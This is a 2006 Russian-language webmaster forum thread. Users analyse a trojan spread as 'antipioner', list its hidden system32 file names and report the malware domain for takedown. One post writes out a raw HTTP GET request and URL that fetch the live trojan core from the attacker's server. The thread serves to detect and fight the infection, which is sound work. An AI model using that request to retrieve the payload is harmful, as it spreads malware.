Реклама на сайте Advertise with us

По поводу всей это беготни с masster-x и antipioner

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:15       Ответить с цитатойцитата 

Значит так - версия подтвердилась.
Программа antipioner была предназначена для того, чтобы сделать невидимыми файлы

wsp1update.*
dnsapi32xbt.*
wsp2update.*
winupdate.*
_xxx_.*
и возможно kernel8.*

на вашем компьютере, затем скопировать один из образцов в папку windows/system32

Приложение http://www.diskinternals.com/products/ntfs-reader/
позволяет Вам увидеть эти файлы.
Всем рекоммендую установить эту программу и проверить - есть ли данные файлы на вашем компьютере. Искать их надо в папке windows/system32.
Фирма в принципе известная, но если не верите, то ищите сами другие способы для просмотра скрытых файлов (не те, что с аттрибутом hidden, а специальные скрытые) в ntfs разделах.

Засабмить свой вебмастерский ресурс, получи PR!

0
 



С нами с 02.03.06
Сообщения: 6461
Рейтинг: 889


Передовик Master-X (16.06.2017) Передовик Master-X (01.07.2017) Передовик Master-X (16.07.2017)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:18       Ответить с цитатойцитата 

MyTraf писал:

Полная проверка диска DrWeb выявила еще одну каку - и именем Dc34.exe (в этот раз в корзине, хотя сам я его не удалял)

NOD тож его в корзине нашёл, тоже не удаляла хехе

Последний раз редактировалось: VESTAL (09/10/06 в 19:54), всего редактировалось 1 раз

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:21       Ответить с цитатойцитата 

По поводу механизма, которым скрываются файлы.
Пока выясняю этот момент.
Скорее всего это сделано с помощью механизма политик безопасности.
При попытке запустить механизм оснастки (Выполнить->gpedit.msc) политики безопасности на пораженной машине (где запускался antipioner.exe) происходит ошибка. Проверьте это у себя плиз.

PS: Модераторы, может приклеим тему наверху? Или народу пофиг на то, что я делаю?

Засабмить свой вебмастерский ресурс, получи PR!

0
 



С нами с 02.03.06
Сообщения: 6461
Рейтинг: 889


Передовик Master-X (16.06.2017) Передовик Master-X (01.07.2017) Передовик Master-X (16.07.2017)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:25       Ответить с цитатойцитата 

Нет не пофиг! Нужное дело делаешь, большое спасибо! Тоже за тему-вверх, задолбалась её искать сегодня, пришлось с крутопа кликать

0
 



С нами с 02.03.06
Сообщения: 6461
Рейтинг: 889


Передовик Master-X (16.06.2017) Передовик Master-X (01.07.2017) Передовик Master-X (16.07.2017)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:32       Ответить с цитатойцитата 

A d u l t писал:

При попытке запустить механизм оснастки (Выполнить->gpedit.msc) политики безопасности на пораженной машине (где запускался antipioner.exe) происходит ошибка. Проверьте это у себя плиз.

ага -widows не удалось найти gpedit.msc

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:33       Ответить с цитатойцитата 

VESTAL писал:
ага -widows не удалось найти gpedit.msc

Эхх.... Значит оснастка не установлена...

Засабмить свой вебмастерский ресурс, получи PR!

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:39       Ответить с цитатойцитата 

Что касается ядра трояна...
Сейчас по адресу hxxp://windows.updates-microsoft.com/6248x2-248Q9297/
лежит ядро. Если запрашивать обыкновенным браузером, то скачивается файл splitter.sys, так сказать для маскировки. Потому что этот файл лежит у каждого в windows\system32\drivers
А если сформировать запрос, который посылает загрузчик трояна, то мы получаем совершенно другой файл, который похож на сам загрузчик. Однако завтра там может оказаться нехилый троян или рут-кит, который сразу же загрузится всем, у кого система поражена. Когда писали абузы, я заметил, что не плохо было бы и домен updates-microsoft.com заабузить, однако он почему-то до сих пор функционирует. рекоммендую всем это сделать, пока не поздно.

Засабмить свой вебмастерский ресурс, получи PR!

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:41       Ответить с цитатойцитата 

Вот запрос, с помощью которого можно получить реальное ядро:
Код:
GET /6248x1-248Q9297/ HTTP/1.1
Host: windows.updates-microsoft.com
Connection: Close

Засабмить свой вебмастерский ресурс, получи PR!

0
 



С нами с 15.10.02
Сообщения: 171
Рейтинг: 30

Ссылка на сообщениеДобавлено: 09/10/06 в 16:42       Ответить с цитатойцитата 

Цитата:
в ntfs разделах.

А если ntfs нету?

Крутим Спедию! За инвайтами в личку!

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 16:52       Ответить с цитатойцитата 

Tapakah2001 писал:
А если ntfs нету?

Если система установлена на fat32, то насколько я знаю, в нем прятать файлы нельзя. Хотя если механизм "прятанья" файлов реализован с помощью политик безопасности, то низя и нужно искать прогу, котора показывает содержимое диска в обход политики безопасности

Засабмить свой вебмастерский ресурс, получи PR!

0
 



С нами с 28.02.06
Сообщения: 44

Ссылка на сообщениеДобавлено: 09/10/06 в 17:07       Ответить с цитатойцитата 

VESTAL писал:
NOD тож его в карзине нашёл, тоже не удаляла хехе

Так посмотри все-таки - в корзине (папка Recycled) или в папке созданное вирусом с "закосом под корзину" (папка RECYCLER)

0
 



С нами с 02.03.06
Сообщения: 6461
Рейтинг: 889


Передовик Master-X (16.06.2017) Передовик Master-X (01.07.2017) Передовик Master-X (16.07.2017)
Ссылка на сообщениеДобавлено: 09/10/06 в 17:19       Ответить с цитатойцитата 

не у меня наоборот RECYCLER есть-это карзина, а вот RECYCLED нет такого

0
 

форумъ сдохъ

С нами с 01.10.04
Сообщения: 4621
Рейтинг: 481

Ссылка на сообщениеДобавлено: 09/10/06 в 17:19       Ответить с цитатойцитата 

A d u l t, я антипионер даже не скачивал. ни одного файла не нашел у себя, но gpedit.msc пишет, что отсутствует.
нужно ли беспокоится, искать?

п.с. хр хоум эдишн

0
 



С нами с 07.10.01
Сообщения: 4835
Рейтинг: 3672


Передовик Master-X (16.06.2008)
Ссылка на сообщениеДобавлено: 09/10/06 в 17:31       Ответить с цитатойцитата 

Adult - респект тебе, не пожалел времени, чтобы раскопать это шнягу! smail54.gif Я, правда, от греха подальше переустанавил систему, начисто (уже заканчиваю, программки ставлю). Вот ведь блин.. Сроду не запускал всякого дерьма - а тут повелся..

Лучшие в Рунете: товарная партнёрка - от 4 рублей за клик.
CPA агрегатор - тысячи отличных офферов!

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 18:01       Ответить с цитатойцитата 

Nic писал:
A d u l t, я антипионер даже не скачивал. ни одного файла не нашел у себя, но gpedit.msc пишет, что отсутствует.
нужно ли беспокоится, искать?
п.с. хр хоум эдишн

Если нет - то не беспокоиться.

Засабмить свой вебмастерский ресурс, получи PR!

0
 



С нами с 02.03.06
Сообщения: 6461
Рейтинг: 889


Передовик Master-X (16.06.2017) Передовик Master-X (01.07.2017) Передовик Master-X (16.07.2017)
Ссылка на сообщениеДобавлено: 09/10/06 в 18:08       Ответить с цитатойцитата 

Adult, прога, которую ты порекомендовал, вышеперечисленных файлов не нашла. Или я не так ищу, её запускаю и выполняю обычный поиск в ней так ведь?

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 18:12       Ответить с цитатойцитата 

VESTAL писал:
Adult, прога, которую ты порекомендовал, вышеперечисленных файлов не нашла. Или я не так ищу, её запускаю и выполняю обычный поиск в ней так ведь?

Поиск там немного глючный. рекомендую напрямую зайти в папку C:\windows\system32 и там смотреть вышеперечисленные файлы.

Засабмить свой вебмастерский ресурс, получи PR!

0
 

www.awm-tools.com

С нами с 28.01.04
Сообщения: 2941
Рейтинг: 3056


Передовик Master-X (01.01.2006) Передовик Master-X (16.01.2006) Передовик Master-X (01.03.2006)
Ссылка на сообщениеДобавлено: 09/10/06 в 18:18       Ответить с цитатойцитата 

Даже если полностью неудастся вычистить систему, рекомендую заабузить домен updates-microsoft.com, так как ядро грузится с этого URL адреса:
hxxp://windows.updates-microsoft.com/6248x2-248Q9297/

Грохнется домен - загрузчику трояна неоткуда будет грузить сам троян.
А по хорошему - лучше все-таки винду переустановить.

PS: Это все на сегодня. Завтра продолжим. Мне тоже отдыхать надо.
PSS: Стукните модераторам, чтобы наконец-то топик приклеили наверх.

Засабмить свой вебмастерский ресурс, получи PR!

0
 



С нами с 19.05.04
Сообщения: 358
Рейтинг: 324

Ссылка на сообщениеДобавлено: 09/10/06 в 18:44       Ответить с цитатойцитата 

Можно глянуть моим антиспаем, один хрен он работает через драйвер ядра и ему по барабану политики безопасности ;)

Делаем спецсофт для PPC, AntiSpyware и не только :) ICQ 2001-4567-3
Gay Top Traffic

0
 



С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010


Передовик Master-X (16.03.2006) Передовик Master-X (01.04.2006) Передовик Master-X (16.04.2006) Передовик Master-X (01.05.2006) Передовик Master-X (01.11.2006) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 09/10/06 в 18:56       Ответить с цитатойцитата 

Xen писал:
Можно глянуть моим антиспаем, один хрен он работает через драйвер ядра и ему по барабану политики безопасности ;)


откуда нам знать, что ты это ты, а не хуй с горы? icon_smile.gif

0
 

traficante de drogas

С нами с 23.11.05
Сообщения: 4786
Рейтинг: 618

Ссылка на сообщениеДобавлено: 09/10/06 в 19:57       Ответить с цитатойцитата 

сейчас кстати надо очень аккуратно смотреть на всякие линки, предложения заманчивые итп.
хуй его знает, что там задумано

зы.
не параноик
зызы
вроде

Продаю афлубин и не парюсь

0
 
+


С нами с 30.07.06
Сообщения: 65
Рейтинг: 1

Ссылка на сообщениеДобавлено: 09/10/06 в 20:10       Ответить с цитатойцитата 

Adult, kit сказал что работает над фиксом. Если хочешь помочь - свяжись с ним.

0
 



С нами с 07.03.06
Сообщения: 61
Рейтинг: 32

Ссылка на сообщениеДобавлено: 09/10/06 в 20:51       Ответить с цитатойцитата 

to A d u l t
big respect!!!
ps. Насколько всё вышеперечисленное актуально для 98 винды?

0
 



С нами с 06.11.02
Сообщения: 24551
Рейтинг: 5315

Ссылка на сообщениеДобавлено: 09/10/06 в 21:36       Ответить с цитатойцитата 

попросил чтобы прибили updates-microsoft.com
сделали.

0
 



С нами с 06.11.02
Сообщения: 24551
Рейтинг: 5315

Ссылка на сообщениеДобавлено: 09/10/06 в 21:38       Ответить с цитатойцитата 

домен абузьте активнее.
masster-x.com засуспендили уже.

теперь updates-microsoft.com

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор сайта

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »